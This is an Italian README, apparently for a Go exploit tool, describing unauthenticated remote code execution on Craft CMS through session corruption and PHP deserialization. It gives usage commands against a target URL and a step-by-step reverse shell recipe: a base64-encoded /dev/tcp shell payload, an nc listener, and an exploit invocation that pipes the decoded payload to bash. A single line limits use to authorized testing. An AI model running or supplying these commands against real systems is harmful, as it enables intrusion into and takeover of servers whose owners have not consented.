
Exploit RCE pre-autenticazione per Craft CMS in Go. Recupera il token di sessione/CSRF, corrompe la sessione PHP e attiva la deserializzazione per l'esecuzione di comandi o una reverse shell.
Exploit per l'esecuzione remota di codice senza autenticazione su Craft CMS, scritto in Go.
Ispirato al lavoro originale di c0gnit00.
GET /admin/loginassets/generate-transform per includere ed eseguire il file avvelenatogo run main.go -u <url> -c <comando>
| Flag | Descrizione | Obbligatorio |
|---|---|---|
-u | URL target (es: http://target.com) | Sì |
-c | Comando da eseguire (es: id, whoami) | Sì |
# Senza Asset ID (brute-force automatico)
go run main.go -u http://target.com -c whoami
1. Genera il payload in base64 con il tuo IP e la tua porta:
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
2. Apri il listener:
nc -lvnp 4444
3. Esegui l'exploit con il payload:
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
Sostituisci il valore in base64 con quello generato al passo 1 con il tuo IP reale.
Per uso esclusivo in ambienti autorizzati e test di sicurezza controllati.